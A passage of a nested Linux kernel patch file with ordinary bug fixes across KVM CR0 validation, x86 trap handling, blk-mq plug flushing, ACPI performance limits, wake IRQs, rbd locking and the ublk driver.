+@@ -78,7 +77,9 @@ static int write_sigio_thread(void *unused)
+ 					       "write_sigio_thread : "
+ 					       "read on socket failed, "
+ 					       "err = %d\n", errno);
+-				swap(current_poll, next_poll);
++				tmp = current_poll;
++				current_poll = next_poll;
++				next_poll = tmp;
+ 				respond_fd = sigio_private[1];
+ 			}
+ 			else {
+diff --git a/arch/x86/include/asm/kvm-x86-ops.h b/arch/x86/include/asm/kvm-x86-ops.h
+index 82ba4a564e587..2c6698aa218b1 100644
+--- a/arch/x86/include/asm/kvm-x86-ops.h
++++ b/arch/x86/include/asm/kvm-x86-ops.h
+@@ -36,6 +36,7 @@ KVM_X86_OP(get_segment)
+ KVM_X86_OP(get_cpl)
+ KVM_X86_OP(set_segment)
+ KVM_X86_OP(get_cs_db_l_bits)
++KVM_X86_OP(is_valid_cr0)
+ KVM_X86_OP(set_cr0)
+ KVM_X86_OP_OPTIONAL(post_set_cr3)
+ KVM_X86_OP(is_valid_cr4)
+diff --git a/arch/x86/include/asm/kvm_host.h b/arch/x86/include/asm/kvm_host.h
+index ef8cabfbe8540..08a84f801bfea 100644
+--- a/arch/x86/include/asm/kvm_host.h
++++ b/arch/x86/include/asm/kvm_host.h
+@@ -1488,9 +1488,10 @@ struct kvm_x86_ops {
+ 	void (*set_segment)(struct kvm_vcpu *vcpu,
+ 			    struct kvm_segment *var, int seg);
+ 	void (*get_cs_db_l_bits)(struct kvm_vcpu *vcpu, int *db, int *l);
++	bool (*is_valid_cr0)(struct kvm_vcpu *vcpu, unsigned long cr0);
+ 	void (*set_cr0)(struct kvm_vcpu *vcpu, unsigned long cr0);
+ 	void (*post_set_cr3)(struct kvm_vcpu *vcpu, unsigned long cr3);
+-	bool (*is_valid_cr4)(struct kvm_vcpu *vcpu, unsigned long cr0);
++	bool (*is_valid_cr4)(struct kvm_vcpu *vcpu, unsigned long cr4);
+ 	void (*set_cr4)(struct kvm_vcpu *vcpu, unsigned long cr4);
+ 	int (*set_efer)(struct kvm_vcpu *vcpu, u64 efer);
+ 	void (*get_idt)(struct kvm_vcpu *vcpu, struct desc_ptr *dt);
+diff --git a/arch/x86/kernel/cpu/mce/amd.c b/arch/x86/kernel/cpu/mce/amd.c
+index 5518272061bfb..991f38f57caf8 100644
+--- a/arch/x86/kernel/cpu/mce/amd.c
++++ b/arch/x86/kernel/cpu/mce/amd.c
+@@ -1265,10 +1265,10 @@ static void __threshold_remove_blocks(struct threshold_bank *b)
+ 	struct threshold_block *pos = NULL;
+ 	struct threshold_block *tmp = NULL;
+ 
+-	kobject_del(b->kobj);
++	kobject_put(b->kobj);
+ 
+ 	list_for_each_entry_safe(pos, tmp, &b->blocks->miscj, miscj)
+-		kobject_del(&pos->kobj);
++		kobject_put(b->kobj);
+ }
+ 
+ static void threshold_remove_bank(struct threshold_bank *bank)
+diff --git a/arch/x86/kernel/traps.c b/arch/x86/kernel/traps.c
+index d3fdec706f1d2..c0a5a4f225d9a 100644
+--- a/arch/x86/kernel/traps.c
++++ b/arch/x86/kernel/traps.c
+@@ -697,9 +697,10 @@ static bool try_fixup_enqcmd_gp(void)
+ }
+ 
+ static bool gp_try_fixup_and_notify(struct pt_regs *regs, int trapnr,
+-				    unsigned long error_code, const char *str)
++				    unsigned long error_code, const char *str,
++				    unsigned long address)
+ {
+-	if (fixup_exception(regs, trapnr, error_code, 0))
++	if (fixup_exception(regs, trapnr, error_code, address))
+ 		return true;
+ 
+ 	current->thread.error_code = error_code;
+@@ -759,7 +760,7 @@ DEFINE_IDTENTRY_ERRORCODE(exc_general_protection)
+ 		goto exit;
+ 	}
+ 
+-	if (gp_try_fixup_and_notify(regs, X86_TRAP_GP, error_code, desc))
++	if (gp_try_fixup_and_notify(regs, X86_TRAP_GP, error_code, desc, 0))
+ 		goto exit;
+ 
+ 	if (error_code)
+@@ -1357,17 +1358,20 @@ DEFINE_IDTENTRY(exc_device_not_available)
+ 
+ #define VE_FAULT_STR "VE fault"
+ 
+-static void ve_raise_fault(struct pt_regs *regs, long error_code)
++static void ve_raise_fault(struct pt_regs *regs, long error_code,
++			   unsigned long address)
+ {
+ 	if (user_mode(regs)) {
+ 		gp_user_force_sig_segv(regs, X86_TRAP_VE, error_code, VE_FAULT_STR);
+ 		return;
+ 	}
+ 
+-	if (gp_try_fixup_and_notify(regs, X86_TRAP_VE, error_code, VE_FAULT_STR))
++	if (gp_try_fixup_and_notify(regs, X86_TRAP_VE, error_code,
++				    VE_FAULT_STR, address)) {
+ 		return;
++	}
+ 
+-	die_addr(VE_FAULT_STR, regs, error_code, 0);
++	die_addr(VE_FAULT_STR, regs, error_code, address);
+ }
+ 
+ /*
+@@ -1431,7 +1435,7 @@ DEFINE_IDTENTRY(exc_virtualization_exception)
+ 	 * it successfully, treat it as #GP(0) and handle it.
+ 	 */
+ 	if (!tdx_handle_virt_exception(regs, &ve))
+-		ve_raise_fault(regs, 0);
++		ve_raise_fault(regs, 0, ve.gla);
+ 
+ 	cond_local_irq_disable(regs);
+ }
+diff --git a/arch/x86/kvm/svm/svm.c b/arch/x86/kvm/svm/svm.c
+index fc1649b5931a4..0a212fe2cd398 100644
+--- a/arch/x86/kvm/svm/svm.c
++++ b/arch/x86/kvm/svm/svm.c
+@@ -1763,6 +1763,11 @@ static void sev_post_set_cr3(struct kvm_vcpu *vcpu, unsigned long cr3)
+ 	}
+ }
+ 
++static bool svm_is_valid_cr0(struct kvm_vcpu *vcpu, unsigned long cr0)
++{
++	return true;
++}
++
+ void svm_set_cr0(struct kvm_vcpu *vcpu, unsigned long cr0)
+ {
+ 	struct vcpu_svm *svm = to_svm(vcpu);
+@@ -4749,6 +4754,7 @@ static struct kvm_x86_ops svm_x86_ops __initdata = {
+ 	.set_segment = svm_set_segment,
+ 	.get_cpl = svm_get_cpl,
+ 	.get_cs_db_l_bits = svm_get_cs_db_l_bits,
++	.is_valid_cr0 = svm_is_valid_cr0,
+ 	.set_cr0 = svm_set_cr0,
+ 	.post_set_cr3 = sev_post_set_cr3,
+ 	.is_valid_cr4 = svm_is_valid_cr4,
+diff --git a/arch/x86/kvm/vmx/vmx.c b/arch/x86/kvm/vmx/vmx.c
+index 07aab85922441..4e972b9b68e59 100644
+--- a/arch/x86/kvm/vmx/vmx.c
++++ b/arch/x86/kvm/vmx/vmx.c
+@@ -1461,6 +1461,11 @@ void vmx_set_rflags(struct kvm_vcpu *vcpu, unsigned long rflags)
+ 	struct vcpu_vmx *vmx = to_vmx(vcpu);
+ 	unsigned long old_rflags;
+ 
++	/*
++	 * Unlike CR0 and CR4, RFLAGS handling requires checking if the vCPU
++	 * is an unrestricted guest in order to mark L2 as needing emulation
++	 * if L1 runs L2 as a restricted guest.
++	 */
+ 	if (is_unrestricted_guest(vcpu)) {
+ 		kvm_register_mark_available(vcpu, VCPU_EXREG_RFLAGS);
+ 		vmx->rflags = rflags;
+@@ -2970,6 +2975,15 @@ static void enter_rmode(struct kvm_vcpu *vcpu)
+ 	struct vcpu_vmx *vmx = to_vmx(vcpu);
+ 	struct kvm_vmx *kvm_vmx = to_kvm_vmx(vcpu->kvm);
+ 
++	/*
++	 * KVM should never use VM86 to virtualize Real Mode when L2 is active,
++	 * as using VM86 is unnecessary if unrestricted guest is enabled, and
++	 * if unrestricted guest is disabled, VM-Enter (from L1) with CR0.PG=0
++	 * should VM-Fail and KVM should reject userspace attempts to stuff
++	 * CR0.PG=0 when L2 is active.
++	 */
++	WARN_ON_ONCE(is_guest_mode(vcpu));
++
+ 	vmx_get_segment(vcpu, &vmx->rmode.segs[VCPU_SREG_TR], VCPU_SREG_TR);
+ 	vmx_get_segment(vcpu, &vmx->rmode.segs[VCPU_SREG_ES], VCPU_SREG_ES);
+ 	vmx_get_segment(vcpu, &vmx->rmode.segs[VCPU_SREG_DS], VCPU_SREG_DS);
+@@ -3160,6 +3174,17 @@ void ept_save_pdptrs(struct kvm_vcpu *vcpu)
+ #define CR3_EXITING_BITS (CPU_BASED_CR3_LOAD_EXITING | \
+ 			  CPU_BASED_CR3_STORE_EXITING)
+ 
++static bool vmx_is_valid_cr0(struct kvm_vcpu *vcpu, unsigned long cr0)
++{
++	if (is_guest_mode(vcpu))
++		return nested_guest_cr0_valid(vcpu, cr0);
++
++	if (to_vmx(vcpu)->nested.vmxon)
++		return nested_host_cr0_valid(vcpu, cr0);
++
++	return true;
++}
++
+ void vmx_set_cr0(struct kvm_vcpu *vcpu, unsigned long cr0)
+ {
+ 	struct vcpu_vmx *vmx = to_vmx(vcpu);
+@@ -3169,7 +3194,7 @@ void vmx_set_cr0(struct kvm_vcpu *vcpu, unsigned long cr0)
+ 	old_cr0_pg = kvm_read_cr0_bits(vcpu, X86_CR0_PG);
+ 
+ 	hw_cr0 = (cr0 & ~KVM_VM_CR0_ALWAYS_OFF);
+-	if (is_unrestricted_guest(vcpu))
++	if (enable_unrestricted_guest)
+ 		hw_cr0 |= KVM_VM_CR0_ALWAYS_ON_UNRESTRICTED_GUEST;
+ 	else {
+ 		hw_cr0 |= KVM_VM_CR0_ALWAYS_ON;
+@@ -3197,7 +3222,7 @@ void vmx_set_cr0(struct kvm_vcpu *vcpu, unsigned long cr0)
+ 	}
+ #endif
+ 
+-	if (enable_ept && !is_unrestricted_guest(vcpu)) {
++	if (enable_ept && !enable_unrestricted_guest) {
+ 		/*
+ 		 * Ensure KVM has an up-to-date snapshot of the guest's CR3.  If
+ 		 * the below code _enables_ CR3 exiting, vmx_cache_reg() will
+@@ -3328,7 +3353,7 @@ void vmx_set_cr4(struct kvm_vcpu *vcpu, unsigned long cr4)
+ 	unsigned long hw_cr4;
+ 
+ 	hw_cr4 = (cr4_read_shadow() & X86_CR4_MCE) | (cr4 & ~X86_CR4_MCE);
+-	if (is_unrestricted_guest(vcpu))
++	if (enable_unrestricted_guest)
+ 		hw_cr4 |= KVM_VM_CR4_ALWAYS_ON_UNRESTRICTED_GUEST;
+ 	else if (vmx->rmode.vm86_active)
+ 		hw_cr4 |= KVM_RMODE_VM_CR4_ALWAYS_ON;
+@@ -3348,7 +3373,7 @@ void vmx_set_cr4(struct kvm_vcpu *vcpu, unsigned long cr4)
+ 	vcpu->arch.cr4 = cr4;
+ 	kvm_register_mark_available(vcpu, VCPU_EXREG_CR4);
+ 
+-	if (!is_unrestricted_guest(vcpu)) {
++	if (!enable_unrestricted_guest) {
+ 		if (enable_ept) {
+ 			if (!is_paging(vcpu)) {
+ 				hw_cr4 &= ~X86_CR4_PAE;
+@@ -5311,18 +5336,11 @@ static int handle_set_cr0(struct kvm_vcpu *vcpu, unsigned long val)
+ 		val = (val & ~vmcs12->cr0_guest_host_mask) |
+ 			(vmcs12->guest_cr0 & vmcs12->cr0_guest_host_mask);
+ 
+-		if (!nested_guest_cr0_valid(vcpu, val))
+-			return 1;
+-
+ 		if (kvm_set_cr0(vcpu, val))
+ 			return 1;
+ 		vmcs_writel(CR0_READ_SHADOW, orig_val);
+ 		return 0;
+ 	} else {
+-		if (to_vmx(vcpu)->nested.vmxon &&
+-		    !nested_host_cr0_valid(vcpu, val))
+-			return 1;
+-
+ 		return kvm_set_cr0(vcpu, val);
+ 	}
+ }
+@@ -8112,6 +8130,7 @@ static struct kvm_x86_ops vmx_x86_ops __initdata = {
+ 	.set_segment = vmx_set_segment,
+ 	.get_cpl = vmx_get_cpl,
+ 	.get_cs_db_l_bits = vmx_get_cs_db_l_bits,
++	.is_valid_cr0 = vmx_is_valid_cr0,
+ 	.set_cr0 = vmx_set_cr0,
+ 	.is_valid_cr4 = vmx_is_valid_cr4,
+ 	.set_cr4 = vmx_set_cr4,
+diff --git a/arch/x86/kvm/x86.c b/arch/x86/kvm/x86.c
+index f48ab047b41d4..32f589b96d997 100644
+--- a/arch/x86/kvm/x86.c
++++ b/arch/x86/kvm/x86.c
+@@ -908,6 +908,22 @@ int load_pdptrs(struct kvm_vcpu *vcpu, unsigned long cr3)
+ }
+ EXPORT_SYMBOL_GPL(load_pdptrs);
+ 
++static bool kvm_is_valid_cr0(struct kvm_vcpu *vcpu, unsigned long cr0)
++{
++#ifdef CONFIG_X86_64
++	if (cr0 & 0xffffffff00000000UL)
++		return false;
++#endif
++
++	if ((cr0 & X86_CR0_NW) && !(cr0 & X86_CR0_CD))
++		return false;
++
++	if ((cr0 & X86_CR0_PG) && !(cr0 & X86_CR0_PE))
++		return false;
++
++	return static_call(kvm_x86_is_valid_cr0)(vcpu, cr0);
++}
++
+ void kvm_post_set_cr0(struct kvm_vcpu *vcpu, unsigned long old_cr0, unsigned long cr0)
+ {
+ 	/*
+@@ -948,20 +964,13 @@ int kvm_set_cr0(struct kvm_vcpu *vcpu, unsigned long cr0)
+ {
+ 	unsigned long old_cr0 = kvm_read_cr0(vcpu);
+ 
+-	cr0 |= X86_CR0_ET;
+-
+-#ifdef CONFIG_X86_64
+-	if (cr0 & 0xffffffff00000000UL)
++	if (!kvm_is_valid_cr0(vcpu, cr0))
+ 		return 1;
+-#endif
+-
+-	cr0 &= ~CR0_RESERVED_BITS;
+ 
+-	if ((cr0 & X86_CR0_NW) && !(cr0 & X86_CR0_CD))
+-		return 1;
++	cr0 |= X86_CR0_ET;
+ 
+-	if ((cr0 & X86_CR0_PG) && !(cr0 & X86_CR0_PE))
+-		return 1;
++	/* Write to CR0 reserved bits are ignored, even on Intel. */
++	cr0 &= ~CR0_RESERVED_BITS;
+ 
+ #ifdef CONFIG_X86_64
+ 	if ((vcpu->arch.efer & EFER_LME) && !is_paging(vcpu) &&
+@@ -11532,7 +11541,8 @@ static bool kvm_is_valid_sregs(struct kvm_vcpu *vcpu, struct kvm_sregs *sregs)
+ 			return false;
+ 	}
+ 
+-	return kvm_is_valid_cr4(vcpu, sregs->cr4);
++	return kvm_is_valid_cr4(vcpu, sregs->cr4) &&
++	       kvm_is_valid_cr0(vcpu, sregs->cr0);
+ }
+ 
+ static int __set_sregs_common(struct kvm_vcpu *vcpu, struct kvm_sregs *sregs,
+diff --git a/block/blk-core.c b/block/blk-core.c
+index 24ee7785a5ad5..ebb7a1689b261 100644
+--- a/block/blk-core.c
++++ b/block/blk-core.c
+@@ -1140,8 +1140,7 @@ void __blk_flush_plug(struct blk_plug *plug, bool from_schedule)
+ {
+ 	if (!list_empty(&plug->cb_list))
+ 		flush_plug_callbacks(plug, from_schedule);
+-	if (!rq_list_empty(plug->mq_list))
+-		blk_mq_flush_plug_list(plug, from_schedule);
++	blk_mq_flush_plug_list(plug, from_schedule);
+ 	/*
+ 	 * Unconditionally flush out cached requests, even if the unplug
+ 	 * event came from schedule. Since we know hold references to the
+diff --git a/block/blk-mq.c b/block/blk-mq.c
+index add013d5bbdab..100fb0c3114f8 100644
+--- a/block/blk-mq.c
++++ b/block/blk-mq.c
+@@ -2749,7 +2749,14 @@ void blk_mq_flush_plug_list(struct blk_plug *plug, bool from_schedule)
+ {
+ 	struct request *rq;
+ 
+-	if (rq_list_empty(plug->mq_list))
++	/*
++	 * We may have been called recursively midway through handling
++	 * plug->mq_list via a schedule() in the driver's queue_rq() callback.
++	 * To avoid mq_list changing under our feet, clear rq_count early and
++	 * bail out specifically if rq_count is 0 rather than checking
++	 * whether the mq_list is empty.
++	 */
++	if (plug->rq_count == 0)
+ 		return;
+ 	plug->rq_count = 0;
+ 
+diff --git a/drivers/acpi/arm64/iort.c b/drivers/acpi/arm64/iort.c
+index 8059baf4ef271..2e1cae53536f5 100644
+--- a/drivers/acpi/arm64/iort.c
++++ b/drivers/acpi/arm64/iort.c
+@@ -998,9 +998,6 @@ static void iort_node_get_rmr_info(struct acpi_iort_node *node,
+ 	for (i = 0; i < node->mapping_count; i++, map++) {
+ 		struct acpi_iort_node *parent;
+ 
+-		if (!map->id_count)
+-			continue;
+-
+ 		parent = ACPI_ADD_PTR(struct acpi_iort_node, iort_table,
+ 				      map->output_reference);
+ 		if (parent != iommu)
+diff --git a/drivers/acpi/processor_perflib.c b/drivers/acpi/processor_perflib.c
+index 757a98f6d7a24..1696700fd2fb5 100644
+--- a/drivers/acpi/processor_perflib.c
++++ b/drivers/acpi/processor_perflib.c
+@@ -53,6 +53,8 @@ static int acpi_processor_get_platform_limit(struct acpi_processor *pr)
+ {
+ 	acpi_status status = 0;
+ 	unsigned long long ppc = 0;
++	s32 qos_value;
++	int index;
+ 	int ret;
+ 
+ 	if (!pr)
+@@ -72,17 +74,30 @@ static int acpi_processor_get_platform_limit(struct acpi_processor *pr)
+ 		}
+ 	}
+ 
++	index = ppc;
++
++	if (pr->performance_platform_limit == index ||
++	    ppc >= pr->performance->state_count)
++		return 0;
++
+ 	pr_debug("CPU %d: _PPC is %d - frequency %s limited\n", pr->id,
+-		       (int)ppc, ppc ? "" : "not");
++		 index, index ? "is" : "is not");
+ 
+-	pr->performance_platform_limit = (int)ppc;
++	pr->performance_platform_limit = index;
+ 
+-	if (ppc >= pr->performance->state_count ||
+-	    unlikely(!freq_qos_request_active(&pr->perflib_req)))
++	if (unlikely(!freq_qos_request_active(&pr->perflib_req)))
+ 		return 0;
+ 
+-	ret = freq_qos_update_request(&pr->perflib_req,
+-			pr->performance->states[ppc].core_frequency * 1000);
++	/*
++	 * If _PPC returns 0, it means that all of the available states can be
++	 * used ("no limit").
++	 */
++	if (index == 0)
++		qos_value = FREQ_QOS_MAX_DEFAULT_VALUE;
++	else
++		qos_value = pr->performance->states[index].core_frequency * 1000;
++
++	ret = freq_qos_update_request(&pr->perflib_req, qos_value);
+ 	if (ret < 0) {
+ 		pr_warn("Failed to update perflib freq constraint: CPU%d (%d)\n",
+ 			pr->id, ret);
+@@ -165,9 +180,16 @@ void acpi_processor_ppc_init(struct cpufreq_policy *policy)
+ 		if (!pr)
+ 			continue;
+ 
++		/*
++		 * Reset performance_platform_limit in case there is a stale
++		 * value in it, so as to make it match the "no limit" QoS value
++		 * below.
++		 */
++		pr->performance_platform_limit = 0;
++
+ 		ret = freq_qos_add_request(&policy->constraints,
+-					   &pr->perflib_req,
+-					   FREQ_QOS_MAX, INT_MAX);
++					   &pr->perflib_req, FREQ_QOS_MAX,
++					   FREQ_QOS_MAX_DEFAULT_VALUE);
+ 		if (ret < 0)
+ 			pr_err("Failed to add freq constraint for CPU%d (%d)\n",
+ 			       cpu, ret);
+diff --git a/drivers/ata/pata_ns87415.c b/drivers/ata/pata_ns87415.c
+index 9dd6bffefb485..602472d4e693e 100644
+--- a/drivers/ata/pata_ns87415.c
++++ b/drivers/ata/pata_ns87415.c
+@@ -260,7 +260,7 @@ static u8 ns87560_check_status(struct ata_port *ap)
+  *	LOCKING:
+  *	Inherited from caller.
+  */
+-void ns87560_tf_read(struct ata_port *ap, struct ata_taskfile *tf)
++static void ns87560_tf_read(struct ata_port *ap, struct ata_taskfile *tf)
+ {
+ 	struct ata_ioports *ioaddr = &ap->ioaddr;
+ 
+diff --git a/drivers/base/power/power.h b/drivers/base/power/power.h
+index 0eb7f02b3ad59..922ed457db191 100644
+--- a/drivers/base/power/power.h
++++ b/drivers/base/power/power.h
+@@ -29,6 +29,7 @@ extern u64 pm_runtime_active_time(struct device *dev);
+ #define WAKE_IRQ_DEDICATED_MASK		(WAKE_IRQ_DEDICATED_ALLOCATED | \
+ 					 WAKE_IRQ_DEDICATED_MANAGED | \
+ 					 WAKE_IRQ_DEDICATED_REVERSE)
++#define WAKE_IRQ_DEDICATED_ENABLED	BIT(3)
+ 
+ struct wake_irq {
+ 	struct device *dev;
+diff --git a/drivers/base/power/wakeirq.c b/drivers/base/power/wakeirq.c
+index d487a6bac630f..afd094dec5ca3 100644
+--- a/drivers/base/power/wakeirq.c
++++ b/drivers/base/power/wakeirq.c
+@@ -314,8 +314,10 @@ void dev_pm_enable_wake_irq_check(struct device *dev,
+ 	return;
+ 
+ enable:
+-	if (!can_change_status || !(wirq->status & WAKE_IRQ_DEDICATED_REVERSE))
++	if (!can_change_status || !(wirq->status & WAKE_IRQ_DEDICATED_REVERSE)) {
+ 		enable_irq(wirq->irq);
++		wirq->status |= WAKE_IRQ_DEDICATED_ENABLED;
++	}
+ }
+ 
+ /**
+@@ -336,8 +338,10 @@ void dev_pm_disable_wake_irq_check(struct device *dev, bool cond_disable)
+ 	if (cond_disable && (wirq->status & WAKE_IRQ_DEDICATED_REVERSE))
+ 		return;
+ 
+-	if (wirq->status & WAKE_IRQ_DEDICATED_MANAGED)
++	if (wirq->status & WAKE_IRQ_DEDICATED_MANAGED) {
++		wirq->status &= ~WAKE_IRQ_DEDICATED_ENABLED;
+ 		disable_irq_nosync(wirq->irq);
++	}
+ }
+ 
+ /**
+@@ -376,7 +380,7 @@ void dev_pm_arm_wake_irq(struct wake_irq *wirq)
+ 
+ 	if (device_may_wakeup(wirq->dev)) {
+ 		if (wirq->status & WAKE_IRQ_DEDICATED_ALLOCATED &&
+-		    !pm_runtime_status_suspended(wirq->dev))
++		    !(wirq->status & WAKE_IRQ_DEDICATED_ENABLED))
+ 			enable_irq(wirq->irq);
+ 
+ 		enable_irq_wake(wirq->irq);
+@@ -399,7 +403,7 @@ void dev_pm_disarm_wake_irq(struct wake_irq *wirq)
+ 		disable_irq_wake(wirq->irq);
+ 
+ 		if (wirq->status & WAKE_IRQ_DEDICATED_ALLOCATED &&
+-		    !pm_runtime_status_suspended(wirq->dev))
++		    !(wirq->status & WAKE_IRQ_DEDICATED_ENABLED))
+ 			disable_irq_nosync(wirq->irq);
+ 	}
+ }
+diff --git a/drivers/block/rbd.c b/drivers/block/rbd.c
+index e009f480675d2..daec0321cd76b 100644
+--- a/drivers/block/rbd.c
++++ b/drivers/block/rbd.c
+@@ -3850,51 +3850,82 @@ static void wake_lock_waiters(struct rbd_device *rbd_dev, int result)
+ 	list_splice_tail_init(&rbd_dev->acquiring_list, &rbd_dev->running_list);
+ }
+ 
+-static int get_lock_owner_info(struct rbd_device *rbd_dev,
+-			       struct ceph_locker **lockers, u32 *num_lockers)
++static bool locker_equal(const struct ceph_locker *lhs,
++			 const struct ceph_locker *rhs)
++{
++	return lhs->id.name.type == rhs->id.name.type &&
++	       lhs->id.name.num == rhs->id.name.num &&
++	       !strcmp(lhs->id.cookie, rhs->id.cookie) &&
++	       ceph_addr_equal_no_type(&lhs->info.addr, &rhs->info.addr);
++}
++
++static void free_locker(struct ceph_locker *locker)
++{
++	if (locker)
++		ceph_free_lockers(locker, 1);
++}
++
++static struct ceph_locker *get_lock_owner_info(struct rbd_device *rbd_dev)
+ {
+ 	struct ceph_osd_client *osdc = &rbd_dev->rbd_client->client->osdc;
++	struct ceph_locker *lockers;
++	u32 num_lockers;
+ 	u8 lock_type;
+ 	char *lock_tag;
++	u64 handle;
+ 	int ret;
+ 
+-	dout("%s rbd_dev %p\n", __func__, rbd_dev);
+-
+ 	ret = ceph_cls_lock_info(osdc, &rbd_dev->header_oid,
+ 				 &rbd_dev->header_oloc, RBD_LOCK_NAME,
+-				 &lock_type, &lock_tag, lockers, num_lockers);
+-	if (ret)
+-		return ret;
++				 &lock_type, &lock_tag, &lockers, &num_lockers);
++	if (ret) {
++		rbd_warn(rbd_dev, "failed to retrieve lockers: %d", ret);
++		return ERR_PTR(ret);
++	}
+ 
+-	if (*num_lockers == 0) {
++	if (num_lockers == 0) {
+ 		dout("%s rbd_dev %p no lockers detected\n", __func__, rbd_dev);
++		lockers = NULL;
+ 		goto out;
+ 	}
+ 
+ 	if (strcmp(lock_tag, RBD_LOCK_TAG)) {
+ 		rbd_warn(rbd_dev, "locked by external mechanism, tag %s",
+ 			 lock_tag);
+-		ret = -EBUSY;
+-		goto out;
++		goto err_busy;
+ 	}
+ 
+-	if (lock_type == CEPH_CLS_LOCK_SHARED) {
+-		rbd_warn(rbd_dev, "shared lock type detected");
+-		ret = -EBUSY;
+-		goto out;
++	if (lock_type != CEPH_CLS_LOCK_EXCLUSIVE) {
++		rbd_warn(rbd_dev, "incompatible lock type detected");
++		goto err_busy;
+ 	}
+ 
+-	if (strncmp((*lockers)[0].id.cookie, RBD_LOCK_COOKIE_PREFIX,
+-		    strlen(RBD_LOCK_COOKIE_PREFIX))) {
++	WARN_ON(num_lockers != 1);
++	ret = sscanf(lockers[0].id.cookie, RBD_LOCK_COOKIE_PREFIX " %llu",
++		     &handle);
++	if (ret != 1) {
+ 		rbd_warn(rbd_dev, "locked by external mechanism, cookie %s",
+-			 (*lockers)[0].id.cookie);
+-		ret = -EBUSY;
+-		goto out;
++			 lockers[0].id.cookie);
++		goto err_busy;
+ 	}
++	if (ceph_addr_is_blank(&lockers[0].info.addr)) {
++		rbd_warn(rbd_dev, "locker has a blank address");
++		goto err_busy;
++	}
++
++	dout("%s rbd_dev %p got locker %s%llu@%pISpc/%u handle %llu\n",
++	     __func__, rbd_dev, ENTITY_NAME(lockers[0].id.name),
++	     &lockers[0].info.addr.in_addr,
++	     le32_to_cpu(lockers[0].info.addr.nonce), handle);
+ 
+ out:
+ 	kfree(lock_tag);
+-	return ret;
++	return lockers;
++
++err_busy:
++	kfree(lock_tag);
++	ceph_free_lockers(lockers, num_lockers);
++	return ERR_PTR(-EBUSY);
+ }
+ 
+ static int find_watcher(struct rbd_device *rbd_dev,
+@@ -3948,51 +3979,68 @@ out:
+ static int rbd_try_lock(struct rbd_device *rbd_dev)
+ {
+ 	struct ceph_client *client = rbd_dev->rbd_client->client;
+-	struct ceph_locker *lockers;
+-	u32 num_lockers;
++	struct ceph_locker *locker, *refreshed_locker;
+ 	int ret;
+ 
+ 	for (;;) {
++		locker = refreshed_locker = NULL;
++
+ 		ret = rbd_lock(rbd_dev);
+ 		if (ret != -EBUSY)
+-			return ret;
++			goto out;
+ 
+ 		/* determine if the current lock holder is still alive */
+-		ret = get_lock_owner_info(rbd_dev, &lockers, &num_lockers);
+-		if (ret)
+-			return ret;
+-
+-		if (num_lockers == 0)
++		locker = get_lock_owner_info(rbd_dev);
++		if (IS_ERR(locker)) {
++			ret = PTR_ERR(locker);
++			locker = NULL;
++			goto out;
++		}
++		if (!locker)
+ 			goto again;
+ 
+-		ret = find_watcher(rbd_dev, lockers);
++		ret = find_watcher(rbd_dev, locker);
+ 		if (ret)
+ 			goto out; /* request lock or error */
+ 
++		refreshed_locker = get_lock_owner_info(rbd_dev);
++		if (IS_ERR(refreshed_locker)) {
++			ret = PTR_ERR(refreshed_locker);
++			refreshed_locker = NULL;
++			goto out;
++		}
++		if (!refreshed_locker ||
++		    !locker_equal(locker, refreshed_locker))
++			goto again;
++
+ 		rbd_warn(rbd_dev, "breaking header lock owned by %s%llu",
+-			 ENTITY_NAME(lockers[0].id.name));
++			 ENTITY_NAME(locker->id.name));
+ 
+ 		ret = ceph_monc_blocklist_add(&client->monc,
+-					      &lockers[0].info.addr);
++					      &locker->info.addr);
+ 		if (ret) {
+-			rbd_warn(rbd_dev, "blocklist of %s%llu failed: %d",
+-				 ENTITY_NAME(lockers[0].id.name), ret);
++			rbd_warn(rbd_dev, "failed to blocklist %s%llu: %d",
++				 ENTITY_NAME(locker->id.name), ret);
+ 			goto out;
+ 		}
+ 
+ 		ret = ceph_cls_break_lock(&client->osdc, &rbd_dev->header_oid,
+ 					  &rbd_dev->header_oloc, RBD_LOCK_NAME,
+-					  lockers[0].id.cookie,
+-					  &lockers[0].id.name);
+-		if (ret && ret != -ENOENT)
++					  locker->id.cookie, &locker->id.name);
++		if (ret && ret != -ENOENT) {
++			rbd_warn(rbd_dev, "failed to break header lock: %d",
++				 ret);
+ 			goto out;
++		}
+ 
+ again:
+-		ceph_free_lockers(lockers, num_lockers);
++		free_locker(refreshed_locker);
++		free_locker(locker);
+ 	}
+ 
+ out:
+-	ceph_free_lockers(lockers, num_lockers);
++	free_locker(refreshed_locker);
++	free_locker(locker);
+ 	return ret;
+ }
+ 
+diff --git a/drivers/block/ublk_drv.c b/drivers/block/ublk_drv.c
+index c56d1c6d8e58d..4459cfbdbcb18 100644
+--- a/drivers/block/ublk_drv.c
++++ b/drivers/block/ublk_drv.c
+@@ -1529,22 +1529,18 @@ static struct ublk_device *ublk_get_device_from_id(int idx)
+ 	return ub;
+ }
+ 
+-static int ublk_ctrl_start_dev(struct io_uring_cmd *cmd)
++static int ublk_ctrl_start_dev(struct ublk_device *ub, struct io_uring_cmd *cmd)
+ {
+ 	struct ublksrv_ctrl_cmd *header = (struct ublksrv_ctrl_cmd *)cmd->cmd;
+ 	int ublksrv_pid = (int)header->data[0];
+-	struct ublk_device *ub;
+ 	struct gendisk *disk;
+ 	int ret = -EINVAL;
+ 
+ 	if (ublksrv_pid <= 0)
+ 		return -EINVAL;
+ 
+-	ub = ublk_get_device_from_id(header->dev_id);
+-	if (!ub)
+-		return -EINVAL;
+-
+-	wait_for_completion_interruptible(&ub->completion);
++	if (wait_for_completion_interruptible(&ub->completion) != 0)
++		return -EINTR;
+ 
+ 	schedule_delayed_work(&ub->monitor_work, UBLK_DAEMON_MONITOR_PERIOD);
+ 
+@@ -1593,21 +1589,20 @@ out_put_disk:
+ 		put_disk(disk);
+ out_unlock:
+ 	mutex_unlock(&ub->mutex);
+-	ublk_put_device(ub);
+ 	return ret;
+ }
+ 
+-static int ublk_ctrl_get_queue_affinity(struct io_uring_cmd *cmd)
++static int ublk_ctrl_get_queue_affinity(struct ublk_device *ub,
++		struct io_uring_cmd *cmd)
+ {
+ 	struct ublksrv_ctrl_cmd *header = (struct ublksrv_ctrl_cmd *)cmd->cmd;
+ 	void __user *argp = (void __user *)(unsigned long)header->addr;
+-	struct ublk_device *ub;
+ 	cpumask_var_t cpumask;
+ 	unsigned long queue;
+ 	unsigned int retlen;
+ 	unsigned int i;
+-	int ret = -EINVAL;
+-	
++	int ret;
++
+ 	if (header->len * BITS_PER_BYTE < nr_cpu_ids)
+ 		return -EINVAL;
+ 	if (header->len & (sizeof(unsigned long)-1))
